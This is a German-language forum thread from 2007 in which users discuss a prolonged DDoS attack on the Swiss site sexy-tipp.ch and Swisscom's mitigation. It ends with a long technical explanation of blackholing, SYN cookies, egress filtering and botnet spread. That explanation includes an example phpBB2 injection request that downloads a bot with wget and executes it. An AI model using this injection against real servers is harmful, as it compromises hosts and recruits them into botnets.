@Kuwi

Ich bin froh über die Weiterleitung dieses Mails, denn ich wusste nichts davon.

Überlege dir einmal, ist es denn wichtig, dass man seine Bankzahlungen über das Internet abwickeln kann. - Das kann man doch auch eben so gut und unter Hinterlassung einer kürzeren Datenspur auf der Post mittels Einzahlungsschein. - Trotzdem würde wahrscheinlich „die Welt zusammenbrechen“, wenn das Internetbanking der UBS angegriffen und zusammenbrechen würde.

Ausser des Tabus gibt es keinen Grund irgend einen anderen Dienstleistungszweig - und dies ist Sexy-Tipp letztlich - anders zu behandeln, zumal die Angreifer auch nach erfolgter Attacke gefährlich bleiben würden - Und es könnte sogar Schule machen, dass man einfach Russen anstellte, um den Konkurrenten fertig machen.

Eigentlich geht es nicht um Sexy-Tipp, sondern um eine gesellschaftliche Gefahr, die ich vorher nicht so genau einschätzen konnte. Da auch heute noch, einige Forenschreiber beweisen es, Sex tabuisiert ist, braucht es eben in so einem Fall mehr Nachdruck bei den Behörden; zudem noch Wahlen sind und dadurch die Zurückhaltung sicher noch grösser ist. - Die Politiker verplempern ihre Arbeitszeit sonst so oder so für Wahlpropaganda, da darf man die erlauchten Herren doch sicher auf akute Gefahren im Internet aufmerksam machen, denn genau so etwas bringt zu Tage, wer ein guter Politiker ist.

Es scheint mir daher, abgesehen davon, dass Sexy-Tipp ein gutes Forum ist, wichtig, dass man dran bleibt, um ein Zeichen zu setzen, dass die Mithilfe an so einer Attacke nicht nur theoretisch strafrechtliche Folgen haben kann. Und der Know-how-Gewinn auf jeder Stufe, den eine erfolgreiche DDoS-Abwehr bringt, ist für jede und jeden der involviert war enorm.

Es könnte sogar sein, ich glaube es zwar nicht, dass dies "nur" eine Hauptprobe war, in der Meinung eine Sex-Seite finde bei den Behörden kein Gehör! Das wäre besonders schlau und besonders gefährlich! - Aber da bleibe ich hartnäckig und sollte irgendwie bewusst geschlampt werden, dann würde ich noch vor dem Wahltermin einen Skandal inszenieren.

@mikepdock

In welchem Board verweilst Du denn nun?

Alles sehr interessant hier, was so über sexy-tipp.ch geschrieben wird.


Gruss & Dank
Silberrücken

Auf IP-Plus ist immer noch dieselbe Fehlermeldung aktuell, wie sie vor 6 Tagen aufgeschaltet wurde. Die Swisscom spricht von "highest priority" und Sexy-Tipp verschickt ein Mailing an alle ehemaligen Benutzer, die sich langsam aber sicher im Forum von Amona sammeln :

Tuesday, 18.09.2007, 16:30

Problems with IP-Plus Nameservers

Severity High
Effects all IP Plus customers
Effect on service DNS - Queries
Swisscom TT
Responsible
Remarks DNS Performance problem caused by overload.

Our Engineers are working on it with highest priority.

Updates
18.09.2007 18:15 Problem fixed. The service is running stable.

ola all

hehehe ich weiss wer hat Sexy-tipp.ch gekauft

@Realchat

Schön für Dich, realchat, dass Du das nun weisst (da hast Du uns armen Nichtwissenden nun wirklich was vor, gratuliere!!!) und nicht weniger schön für uns - wir sind Dir ewig dankbar- , dass Du unser Wissen so entscheidend und informativ vermehrt hast.

Galeotto

PS. Echt, realchat, who cares.... hehehe!!!

Sollte sich die Bundesanwaltschaft nicht auf höchster Ebene um das offenbar massive Problem gekümmert haben, dann würde ich mich ohne Absprache an die Presse wenden und eben auch Lateralschaden in Kauf nehmen, so dass es die Wahlen beeinflussen könnte und Köpfe von Politikern rollen würden.

Ich hoffe, dass die Bundesanwaltschaft, die Swisscom, Sexy-Tipp und Webline mitlesen. Meine Drohungen, das Ganze zu veröffentlichen, sind nicht leer, denn wenn sie das wären, dann würde ich mein Gesicht hier und bei den Lesern des Amona-Forums, sowie des ST-Forums total verlieren. – Ich bitte euch daher, gebt mir ein Zeichen, wo wir stehen in unseren Bemühungen gegen diesen offenbar grössten Angriff auf eine CH-Website aller Zeiten! - Oder steckt etwas anderes dahinter?

Das Dümmste, was ihr machen könnt, ist nicht mit mir zu kommunizieren, denn dann werde ich sicher nicht mehr abwarten. - Drohungen jeder Art werden übrigens unnütz sein, auch wenn ich Schaden nehmen sollte, dafür habe ich gesorgt!

ich liebe diesen thread. auf gehts nik2!

Nik2

Na,na Nik,

ich kenne und schätze Dich an sich als besonnenen Menschen, aber nun machst Du für mein (bescheidenes) Empfinden doch einen Auftritt, der mit seinem Pathos etwas an die tragischen Helden der italienischen Opern erinnert.

La vita è bella ! Aber nur, wenn wir dieses Leben auch nach Kriterien der Verhältnismässigkeit leben. Missverstehe diese Aussage nicht als eine Disqualifizierung und Brandmarkung deiner Person als Don Quichote, der gegen die Windmühlen kämpft, oder als Aufruf zum langweilig bequemen und pseudoharmonischen Handeln, doch scheint mir, liegt eine gewisse Weisheit ebengerade darin, die Sachen in ihrer Verhältnismässigkeit zu erkennen und dann auch dementsprechend zu handeln.

Ist denn die Sache des ST und deren sich bekämpfenden Hintermänner - und ich sehe da allmählich etwas klarer durch - sooooo wichtig? Und ist es für Dich - wenn wir die Menschheit und deren Probleme so angucken - denn so wichtig was da so ein paar ST Nostalgiker oder Ayomleser über Dich und Dein Engagement denken, wenn du Dich für diese Sache stark machst oder nicht. Das geht doch den meisten eigentlich am A.... vorbei, natürlich nicht Du als Person, denn Du bist eine respektable niveauvolle Person, sondern die Sache, um die es hier geht. Ist doch egal wenn sich die globalen Puffimperialisten unter der Führung des Alexander d. Grossen und Antonius Minimus und wie die Feldherren alle heissen mit Roi François, dit "de la bon vie", de Dübendorf Schlachten liefern sollten, wäre ja deren Sache und nicht unsere. Mischen wir uns da doch nicht in den online resp. offline-Krieg "der Milieuterminators" ein !

Du kannst natürlich tun und lassen, was Du willst, es ist ja Dein Leben und Deine Integrität ist ungeachtet wie du hier handelst, so oder so gewahrt, allerdings, besinn Dich doch auf die Verhältnismässigkeit der hier in Frage stehenden Sache auch gerade mit Bezug auf den Verkehr mit den Behörden, auch die machen eine Triage nach Dringlichkeit einer Sache und deren Bürokratiemaschine läuft nicht eben gerade mit einem Turbolader!

Möchtest Du da noch durch eventuelles (sehr unwahrscheinliches Köpferollen - haben sich die Raben je gegenseitig die Augen ausgehackt ???) im Wahlkampf mitmischen egal auf welcher Seite Du politisch auch immer stehst, solltest Du Dich beeilen, den Ball ins rollen zu bringen. Viel Zeit bleibt Dir dazu nicht mehr. in fünf Monaten ist ja wieder Fasnachtszeit...

Sei mir nicht böse Nik, aber lassen wir diese doch wirklich marginale Angelegenheit ihren Lauf nehmen und sehen wir erst mal, was da so passiert. Kannst Dich ja dann immer noch für das Eine oder Andere stark machen, wenn es Dir dann noch sinnvoll erscheint.

Gruss
Galeotto

@Galeotto

Natürlich bin ich dir nicht böse, im Gegenteil, aber ich möchte nun einmal wissen, was dahinter steckt, es interessiert mich ganz einfach. Und zwar unabhängig davon, dass mir Sexy-Tipp tatsächlich am Herzen liegt. – Es liegt mir übrigens am Herzen, weil dort solche Leute wie du schreiben und ich gerne gute Aufsätze lese und auch zu schreiben versuche.

Und da ist noch etwas, vor einer Woche schrieb mir die Webline, dass sie bereit seien, sich mit mir zu treffen. Als ich dann nachfragte, ob sie mir bitte einen Termin nennen möchten, war wieder tagelang Funkstille und jetzt, wo ich Druck ausübe, heisst es ich solle nächsten xxxx kommen. Ich antworte ihnen sofort und verlangte eine Bestätigung mit Uhrzeit, da ich flexibel sei und mich Ihnen anpassen würde. – Nun herrscht wiederum totale Funkstille. ST und Webline kommunizieren so katastrophal, dass sie das Gegenteil von dem erreichen, was sie möchten: Sie machen uns alle immer "gwundriger", was da wohl passiert sei. – Und in den Augen vieler sind sie unglaubwürdig geworden. - Ich selber glaube immer noch an einen DDoS-Angriff, etliche User haben jedoch ganz andere Vermutungen geäussert.

@Galeotto

Heute habe ich deine Worte noch einmal gelesen und möchte hier etwas ergänzen und bemerken. Da du ein intelligenter Mann bist, bei dem sowohl Kopf, wie Bauch gut entwickelt sind, hast du tatsächlich richtig erkannt, dass meine persönliche Integrität nicht davon abhängt, was Zitat: „ST Nostalgiker oder Ayomleser über mich und mein Engagement denken“. Aus rhetorischen und didaktischen Gründen habe ich, wie du richtig gemerkt/bemerkt hast, da wohl etwas übertrieben!

Trotzdem ist es mir relativ "wurst", wie viele Probleme oder vermeintliche Probleme die Menschheit hat. – Ich persönlich versuche die Welt in meiner ganz kleinen, näheren Umwelt zu verändern. Im kleinen und mir persönlich anliegenden, finde ich auch die Motivation etwas bewegen zu wollen. Selbstverständlich spielen da ganz persönliche Gründe, die mit mir, als von meiner Umwelt geprägten Menschen zu tun haben, rein. Ein Grund, nicht der Wichtigste (die anderen sind mir jetzt in diesem Moment zu persönlich, um freizugeben), ist der, dass mich die DDoS-Geschichte fasziniert hat, weil ich realisierte, dass da eine Gefahr herrschte, die ich bis jetzt ausgeblendet hatte. – Eine Gefahr, die uns hochentwickelten Länder hart treffen könnte, würden solche Attacken noch vermehrt Schule machen. Und ich, immer Marktlücken suchend, sah hier die Möglichkeit, an einem praktischen Beispiel bescheidenes Wissen aufzubauen, das mir vielleicht etwas später eine etwas andere Ausrichtung meines Berufslebens ermöglichen könnte (dabei weiss ich schon, dass es dazu noch sehr viel mehr bedurfte und der Weg weit ist). Ich habe das Gefühl, dass in diesem Bereich der EDV ganzheitlicheres Denken eingesetzt werden könnte und vielleicht sogar das Bauchgefühl Platz hätte, was mir sehr entgegenkäme.

Nun, ich halte das Phänomen, dass eine Web-Seite so lange bombardiert und unten gehalten werden kann, tatsächlich als ein, für unsere moderne Gesellschaft, wichtiges Problem! – Und ich möchte, ja will jetzt einfach wissen, ob es tatsächlich möglich ist, so massive Attacken aus dem Internet zu bestellen und zu „organisieren“, oder ob wir von Webline & Co manipuliert worden sind. – Sollte es ein reales Problem sein/gewesen sein, dann möchte ich mich in diesem(n) Bereich effektiv möglichst rasch weiterbilden/einarbeiten.

In Bezug auf das Verhalten der Raben bin ich mit dir nicht einverstanden, ich sehe ja, wie sich diese im Moment die Augen geradezu aushacken – und ich halte ein Köpferollen für nicht unwahrscheinlich. Ich weiss jedoch, dass ein allfällig angezettelter Skandal, auch leicht die Seite treffen könnte, die ich hätte unterstützen wollen und ich wäre daher wesentlich zurückhaltender mit so einem Experiment, als ich es schrieb. – Das reine Experiment jedoch, ob so eine bewusste Anzettelung eines Skandals mit realem Hintergrund möglich wäre, würde mich tatsächlich reizen.

Was mich übrigens ebenfalls reizt, ist etwas hinter die Mechanismen des vermeintlichen oder tatsächlichen Milieukrieges zu kommen, da ich denke, dass da, in überhöhter Art und Weise, lediglich etwas abläuft, das in der gesamten Wirtschaft Gang und Gäbe ist und damit gewisse Mechanismen und Gesetze des ungebremsten und ungeregelten Kapitalismus’ noch klarer, als nur in den Leerbüchern, aufzeigt würden. – Die Feldherren und welcher Feldherr konkret gewinnen würde, interessierte mich jedoch weniger, würde doch jeder Ausgang der Schlacht neue Möglichkeiten für uns Benutzer eröffnen, sind wir doch offenbar eher aktive, initiative Menschen.

Nun Galeotto, ich hoffe, dass du mich mit deinen wunderbaren textlichen „Ergüssen“ auch weiterhin zum Denken und vor allem zur Selbstreflektion anhältst, denn ich suche das natürlich förmlich...

ola Nik2

glaub mir solche angriffen kannst du ohne weiter probleme bestellen (geld frage) oder selbst ausführen mit eine bisschen übung

lg

realchat

@Mod

Du schriebst:

Wo du recht hast, hast du recht. Sexy-Tipp gehörte tatsächlich der Webline GmbH und wurde verkauft. - Das ist keine Vermutung, sondern eine gesicherte Information.

@Nik

Lieber Nik,

freut mich - ich bin geehrt - dass meine postings Dich zuweilen zur Selbstreflektion bringen.
Woher aber willst Du wissen, dass mein Bauch gut entwickelt ist ?
Aha..!...; erst jetzt merk ich's (he,he,he), Du hast wohl gemeint, dass ich über eine gut entwickelte Intuition verfüge.... Akzeptiere ich gerne, so lang diese nicht als Synonym für blühende Phantasie verstanden wird.

Spass beiseite, da magst Du mit der Intuition vielleicht recht, haben, zumindest im Fall dieser ST-Marginalie, denn meine Vermutungen um diese Angelegenheit haben sich mehr oder minder bestätigt, aber: so what ?

Tatsache ist, dass das ST-Forum noch immer am gleichen Übel krankt und weiterhin so massiv bombardiert wird, dass es nicht funktionieren kann.
Dass da wohl eine Profibande von kommerziell ausgerichteten Computerfreaks dahintersteckt, die sich von einem gut betuchten Auftraggeber fürstlich honorieren lässt (und dies fraglichem Auftraggeber auch wert sein muss), dürfte mittlerweile auch klar sein.
Ebenso evident ist, dass da keine schweizerische religiöse Fundis dahinterstecken, zumal denen im Unterschied zu ihren amerikanischen Kollegen und den katholischen Exklusivfundis des Opus Dei dazu einfach das nötige "Kleingeld" fehlt.

Wenn wir nun davon ausgehen, dass der Angriff auf Sexy Tipp seinem (vermutlichen)Besitzer Globe - hallo realchat ! -gilt, ja dann kann man ja eins und eins zusammenzählen, wer einen solchen Angriff lanciert haben könnte.
Jedem, der schon am Zürcher Flughafen eingecheckt hat und die Augen zuvor offen gehalten hat und dabei schönen monumental gross gezeigten Frauenbeinen nicht abhold ist, ja dem wird's wohl allmählich dämmern...
Vielleicht ist in dem Punkt meine Intuition Phantasie geworden, aber trotzdem so als Arbeitshypothese, wäre das mindestens nicht abwegig....

Wenn sich's also um einen Milieukriege handelte - oh hätten wir nur Kriege dieser Art, der Weltglobe wäre ein so viel angenehmerer Ort! - ja , dann muss ich Deine Kritik an meinem auf die Behörden bezogenen Vergleich der sich die Augen nie aushackenden Raben zurückweisen.

Die Mitglieder einer Behörde sind mehr oder minder harmonisch im gleichen Boot sitzende, und mal in ruhigen und mal etwas bewegteren Wassern vor sich hin dümpelnde oder mal stärker rudernde Menschen. Die übergeordnete Instanz - das Boot - ist der Kanton oder Staat, also eine Einheit mit gemeinsamen Zielen. Dort macht es keinen Sinn sich innerhalb gleicher Interessen zu bekriegen.
Anders steht es mit Bezug auf die Milieukrieger. Dort ist nicht das Milieu der "Staat", sondern nur übergeordneter Begriff für die Gesamtheit einer Berufsgattung. Jeder Puffbesitzer ist ein eigenes Boot mit eigenen Seemännern resp. Seefrauen und eigenen Zielen, und diese Raben kratzen sich nun sehr wohl die Augen aus, denn die Kapitäne stehen in Konkurrenz zueinander und da verkeilen sich halt die griechischen Galeeren mit jenen der Perser.

Aber der ganze Kram um Sexy Tipp ist an sich eher belanglos, insbesondere die Frage nach der Weiterexistenz dieses Forum oder eben nicht.

Bedenklicher - und da gebe ich Dir Nik recht - ist die Tatsache, dass da organisierte und profimässig agierende Internetbanditen ungestört und munter ihr Unwesen treiben können und grosse Organisationen wie Swisscom dagegen ziemlich machtlos sind.
Ich unterstelle diesem Unternehmen und deren Technikern nicht, dass sie da bloss untätig und unfähig zuschauen, aber ich habe so das Gefühl, dass die da trotz eines sicherlich grossen technischen und personellen Aufwands köpfeschüttelnd wie die Esel am Berge stehen. keine Frage, irgendwann werden sie das wieder hinkriegen, aber die nächsten Netzpiraten - es ist nunmehr offenbar ein lukratives Geschäft geworden - stehen sicher an anderer Stelle und in einem anderen Zusammenhang bereits vor der Türe - und das mit einem noch ausgetüfftelteren System.
Wohin das führen wird weiss ich nicht, denn ich kenne mich in solchen Dingen etwa so gut aus wie ein Velomech in Astrophysik. Aber es kommt so ein ungutes Gefühl auf.

Wenn das Problem um Sexy Tipp - nicht in der Frage "ST oder nicht ST ?", das interssiert doch keinen - sondern auf der Ebene der Technik und der Sicherheit im Netz öffentlich thematisiert würde, namentlich von den hier involvierten Stellen, wäre das begrüssenswert. Allerdings gilt zu bedenken, dass damit ein Prestigeverlust und demzufolge auch eine Einbusse im Markt abzusehen wäre, folglich.................

Gruss
Galeotto

Hi Galeotto,

Das kann ich getrost stehen lassen!

Ich selber nehme mir jetzt ein paar Tage Auszeit.

Liebe Grüsse
Nik

Ich habe folgendes in Erfahrung gebracht:

Die ST-Angriffe sind kein Fake, Sexy-Tipp wird tatsächlich von etwa einer Million Zombies angegriffen, sobald der DNS-Eintrag jeweils wieder aktiv ist. So einen Angriff zu organisieren kostet etwa tausend Dollar im Tag. Von mir aus gesehen gibt es da nicht viele Kandidaten, die so lange so viel Geld aufbringen können. - Doch wo kein Beweis ist, kann zwar eine Anzeige gegen Unbekannt, aber keine Anklage erfolgen.

Sexy-Tipp wird entweder diese Woche wieder aufgeschaltet werden, oder, sollte dies wiederum schief gehen, zu einem sehr grossen Provider in den USA wechseln, um die Domäne zu hosten. Doch wird Sexy-Tipp so oder so wieder kommen, die Frage ist nur wann!

Die Swisscom hat es nicht ganz einfach, weil alle anderen Provider, insbesondere die nicht mehr schweizerische Cablecom, sich geweigert haben irgend etwas zu unternehmen. Für Swisscom ist es eine gute Gelegenheit Know-How zu gewinnen, denn in Zukunft wird es matchentscheidend sein, wer solche Angriffe im Griff haben wird.

Das grosse Problem ist, dass bei solchen Angriffen oft keine Bandbreite mehr vorhanden ist, um zu antworten, obwohl die vielen Anfragen den Server nicht zu Boden bringen würden. Das erinnert mich übrigens an eine Aussage von jAuer, der die Server unbehelligt vorgefunden hatte, obwohl sie nicht mehr erreichbar gewesen waren.

jAuer schrieb:

Was spricht gegen eine Filterung der Requests aufgrund der IP-Adresse?

Könnte man Requests von nicht-schweizer IPs nicht schon auf Routerebene blocken?
Gibt es da technische Probleme so etwas zu machen?


Denn dieses Vorgehen würde die Seite aus der Schweiz wieder erreichbar machen, und somit auch den Angriff sinnlos machen. Dieser würde dann wahrscheinlich eingestellt werden.

@PH

Ich selber verstehe zu wenig davon. Ich bin erst auf dem Weg mir Wissen anzueignen. Doch ist es offenbar so, dass die Swisscom so eine Filterung macht, aber die Cablecom und andere grosse Schweizer Provider sich nicht um das Problem kümmern und somit über diese Provider immer noch genug Datenpakete reinkommen, um die Bandbreiten Richtung Deutschland und Italien massiv zu schmälern. Zwar hat Swisscom im Ausland „Blackholes“ eingerichtet, aber damit kann nicht alles abgefangen werden, was da kommt – und die Angriffe galten danach speziell den IP-Plus-DNS', was den Totalausfall bewirkte.

Es spricht sehr für die Swisscom, dass sie sich explizit zur Verfügung gestellt hat, diesen Grossangriff abzuwehren. Man kann so die Beta-Version eines Abwehrkonzepts testen und massiv verbessern. Ich denke, dass der Know-How-Gewinn, den Swisscom dadurch hat, ein grosser Wettbewerbs-Vorteil sein wird. - Doch denken, von aggressiven Auslandfirmen übernommene, CH-Firmen wahrscheinlich generell nur kurzfristig, man sieht es ja auch darin, wie Cablecom den Kundendienst vernachlässigt.

Ich selber habe nicht alles ganz genau verstanden, von dem ich erfahren habe. Und dies trotz expliziter Rückfrage. Es wäre nett, wenn uns jemand von euch Techniker(innen) folgendes etwas näher erklären könnte:

Was sind "Blackholes" im Ausland. Ich weiss schon, dass es schwarze Löcher sind, die die "falschen" Datenpakete irgendwie "reinziehen" und nicht mehr weiterleiten. Aber wie und wo macht man das? Sind das Konfigurationen auf zentralen Routern?

Wieso ist die Swisscom darauf angewiesen, dass ihre Mitkonkurrenten die "falschen" Datenpakete ebenfalls rausfiltern, kommt denn nicht der ganze Datenverkehr über einen Swisscom-Router, der dann die Filterung zum angegriffenen Server vornimmt. Oder ist das Problem eben, dass die Bandbreiten der Swisscom oder zwischen den verschiedenen Ländern zu sehr geschmälert werden. Doch würde ich auch das nicht verstehen, es gibt doch Firewalls oder Switches, die die Bandbreiten für den Verkehr zu einer bestimmten Domäne beschränken. Ein Beispiel: Ich besitze einen Internet-Anschluss und habe Bluewin-TV; beide Systeme hängen bei mir am gleichen Hub/Switch, haben jedoch unterschiedliche Bandbreiten.

Wenn ich etwas „gescheiter“ wäre, dann könnte ich mein Wissen über den Angriff vielleicht noch etwas besser einfliessen lassen, weil ich im Nachhinein verstehen würde und einordnen könnte. Ich danke euch daher im Voraus für eure Beiträge.

Blackholes werden bei angrenzenden ISP (Backbone Providers) eingerichtet. Die Swisscom kann per BGP (Border Gateway Protocol) die Router hinter ihren Backbone Eingängen konfigurieren. Somit muss Swisscom nun nicht mehr ihre Bandbreiten Provider kontaktieren um eine IP Sperre einzurichten, dieses System funktioniert automatisch.

Grundsätzlich ist ein Blackhole im Netzwerk-Jargon ein Router welcher das Packet "leise Verwirft". Normalerweise würde der Router per ICMP mitteilen, warum die Anfrage nicht erfolgreich war (keine Route, kein Service, etc.).

Professionelle Router sind fähig den Traffic auf mehreren Ebenen zu filtern. Somit können nicht nur simple IP Blockaden implementiert werden, sondern spezifische Filter erarbeitet werden. Dadurch kann der Router z.B. selektiv anhand des HTTP Requests, Cookies, User-Agent, URL, usw., den Traffic Blockieren (Droppen, Null-Routen). Solche Router sind nicht Billig, weshalb man für eine 100 MBit Backbone Leitung (ISPs wie die Swisscom haben mehrere Bandbreiten Provider) keinen Router kauft der für mehrere GBit ausgelegt ist (Kosten/Nutzenfrage). Jedoch benötigt die Filterung des Traffics nicht unerheblich CPU und Speicher, speziell wenn die Packete sehr genau inspiziert werden sollen. Deshalb ist es für die Swisscom von grossem Interesse, diese Filterung gleich bei ihren Backbone Providern durchzuführen. Ich denke das dies soweit geht, das nun z.B. der Backbone Provider (wie z.B. switch) diese Filter in ihrem "internen" Netz (siehe link zu Switch) auf alle Router verteilt, welche Traffic von "aussen" bekommen. Dadurch kann sich die "Switch" sehr viel "internen" Traffic ersparen, und eine Leitung von Genf nach Zürich ist auch nicht gerade Billig. Ich kenne das BGP nicht genau, doch IMO sollte es machbar sein, diese Filter noch weiter, über die grenzen von Switch hinaus zu installieren (solange der Filter auf die spezifischen IP-Destination-Ranges des anfordenden ISP beschränkt werden, ansonten bestünde die Möglichkeit das Traffic bei anderen Kunden des Backbones falscherweise Blockiert würde). Die Filterung wird wohl jedoch kaum oft sehr weit gehen, da es wohl ab einer gewissen Stufe keinen Sinn mehr macht, wenn der Filter denn seine Wirkung tut. Sobald bei einem Router mit Filter die Belastung nicht zu gross ist, wird man sich kaum noch bemühen die Filterung weiter "nach hinten" zu verschieben.

Wie das Bandbreiten Management (QOS=Quality of Service) auf deiner Seite bei der Swisscom geschieht, weiss ich nicht. Eine einfache Lösung die mir einfallen würde, wäre eine Ausnahme im Traffic Shaping auf eine spezielle Ziel-IP (oder Range), von welcher aus die TV-Daten geliefert werden. Wenn ich das richtig verstanden habe, schliesst du die TV-Anlage ja per Ethernet/DHCP hinter den ADSL Router!?

Gespoofte IPs werden heute nur noch als Bandbreiten Verstopfer eingesetzt. Seit der Einführung von SYN-Cookies benötigen halb offene Verbindungen keinen Speicher mehr. Beim Linux Kernel muss man dies jedoch explizit auswählen (Keine Ahnung wieso das nicht default mässig gesetzt ist). Beim TCP-Handshake wird zuerst die SEQ (Sequence, als nummerischer Wert) übertragen, danach sendet der andere Host ACK=SEQ+1 (ACK="Antwort") zurück. Früher hatten die Systeme eine SYN-Warteschlange. Der IP-Stack musste sich ja merken, welche Nummer er gesendet hatte, um zu überprüfen ob der Host auch genau ACK=SEQ+1 zurück gesendet hat. Mit SYN-Cookies wird kryptographisch die initiale SEQ Nummer generiert. Wenn nun ein Host eine ACK Nummer zurück sendet, rechnet der IP-Stack diese minus eins und kann aus dem Wert verifizieren, das der Host von ihm initial kontaktiert wurde (also kein "man in the middle" ist).

Bei TCP ist dies die einzige Konsequenz. Mit gespooften IP Adressen kann man keine URL auf einem Webserver aufrufen, da man nicht über den TCP-Handshake hinauskommt. Bei UDP Services (z.B. DNS) sieht dies etwas anders aus. Daten mit gespooften Adressen erleben über TCP nur den IP-Stack, UDP Packete werden jedoch ohne "Prüfung" an die Applikation weiter gereicht. Solche Attacken können sehr viel Ressourcen verbrauchender sein, da die Anfrage effektiv verabeitet und beantwortet wird. Jedoch gibt es nur noch sehr wenige "wichtige" Services per UDP.

Man benötigt zudem unter Linux root Rechte um auf IP-Stack Ebene Packete selber zu generieren (mit gefälschter Absender IP) und zu versenden. Ich hoffe das ist bei Windows genaus so (glaube bei XP Home war es nicht so).

Dazu kommt, das schon einige (viele?) ISPs egress filter betreiben. Damit wird Traffic, der auf einem Port ihrer Router reinkommt, gedroppt, sollte er nicht mit einer IP versehen sein, die an diesem Port verbunden ist. Man kann damit also nur noch Packete mit einer absender IP-Adresse versenden, welche man auch wirklich per DHCP bezogen hat.

Bot-Netze werden sehr gerne auf Webservern installiert, auf denen ungepatchte Software läuft (bekanntes Beispiel phpBB2, Mambo, etc.). Mietet man sich Webspace, dann erwartet man auch php, perl, cgi, etc. (evtl. sogar ssh). Dazu gehört z.B. das man unter php auch eine "externe resource" downloaden kann. Es gibt ISPs die damit sehr restriktive Umgehen, jedoch benötigt das viel mehr administrativen Aufwand. Als Tipp kann ich dazu nur sagen, das man tmp Verzeichnisse immer nur "non-executable" mounten soll. Wenn Applikation ein tmp benötigen wo sie Dateien Ausführen können, muss man halt diese explizit erstellen und konfigurieren. Bei den phpBB2 hacks wurden meist per "URL Buffer Überlauf" Scripte ins tmp Verzeichniss geladen und ausgeführt. Diese haben wiederum ein Script heruntergeladen (zumeist ein veränderter IRC client in Perl). Dieses Script verbindet sich mit dem Bot-Netz über IRC. Früher hatten einige einen expliziten Server per IP Adresse als IRC-Server im Code drin. Somit war es nicht ganz unmöglich diese Leute zu finden, wenn man Zugriff auf diesen einen Server bekam. Es ist allerdings nur eine Frage des programmiertechnischen Geschicks, wie weit man das ganze Verschleiern kann.

Bot-Netze vergrössern sich zumeist auch selbständig. Hier ist eine beliebte Methode das Scannen von IP-Subnetzten, welche ähnlich der eigenen öffentlichen IP sind, um nach allfällig default mässig installierten Applikation, welche einen Angriff zu lassen, zu suchen. Dabei wird ein präparierter request (z.B. h**p://host/phpBB2/dl.php?file='´wget url /tmp/bot && /tmp/bot´') gesendet. Fals genau dort eine ungepatchte Version (ohne erweiterte Sicherheit beim tmp Verzeichniss) installiert ist, wird der Host ins Bot-Netz "assimiliert". Eine erweiterte Moglichkeit ist nach der "verwundbaren" PHP Datei via Google zu suchen, um gezielt die "möglichen Opfer" auszuwählen.

Als (begrenzter) Schutz kann die Firewall auch auf Ausgehende Verbindungen beschränkt werden. Dies bringt jedoch auch erhöhten administrativen Aufwand und kann umgangen werden. Normalerweise würde man, wenn man nicht alles Blockieren will was nach aussen geht (z.B. downloads), den Port 80 (Outgoing) für WWW Services auf machen. Ein intelligentes Bot-Netz kann sich dies jedoch zunutze machen, indem es selektiv nur Bot-Nodes alls Fallback-Server aussucht, auf denen noch kein Service auf Port 80 läuft.

Ich beschäftige mich schon etwas länger mit Linux und betreibe ein paar webserver (zuhause über cablecom, sowie zwei root-server in einem RZ). Ich hatte schon phpBB2 Hacks (Bot-Netz) oder DDOS (wegen falschkonfigurationen). Als Hosting Anbieter stelle ich die Möglichkeit für PHP Applikationen zur Verfügung, ich kann jedoch nicht kontrollieren, ob nun alle Kunden die neuesten Versionen installiert haben. Ich kann einzig auf den ausgehenden Traffic achten und auf die Prozessor- und Speicher-Auslastung. Solange dies im grünen Bereich ist, bin ich nicht beunruhigt. Ich checke dazu noch alle paar Wochen die Prozess-Liste, dadurch ist mir auch das mit dem phpBB2 Hack aufgefallen. Es hat mich als Admin also auch nicht ganz verschont; knapp 1 Woche habe auch ich meinen Server unfreiwillig zum Spammen zur Verfügung gestellt. Ich habe daraus jedoch meine lehren gezogen.

Ich glaube dass mit den beschriebenen Einstellungen heute 50% weniger Bots existieren würden. Es ist jedoch ein Katz- und Maus-Spiel. Man muss sich verdammt Gut informieren und es ist eine heiden Arbeit alles korrekt zu konfigurieren. Das Grundproblem sind die Sicherheitslücken in Betriebssystemen und zumeist (PHP) Web-Applikationen. Dadurch enstehen erst die gewaltigen Bot-Netze. Solange dieses Problem besteht, werden wohl auch die Probleme mit DDOS-Attacken nicht verschwinden.

Sorry, das ist jetzt wirklich etwas viel geworden; hoffe es ist verständlich genug um etwas Klahrheit zum Thema DDOS beizutragen.

Gruss, Maurice

Vielen Dank Maurice,

Du hast dich ja extrem ins Zeug gelegt! Aber das erschlägt mich, ich muss es erst sichten, bevor ich überhaupt etwas dazu sagen kann! Doch scheint mir die Netzwerktechnik auf dieser Ebene ein sehr intreressanter Bereich der Telematik zu sein!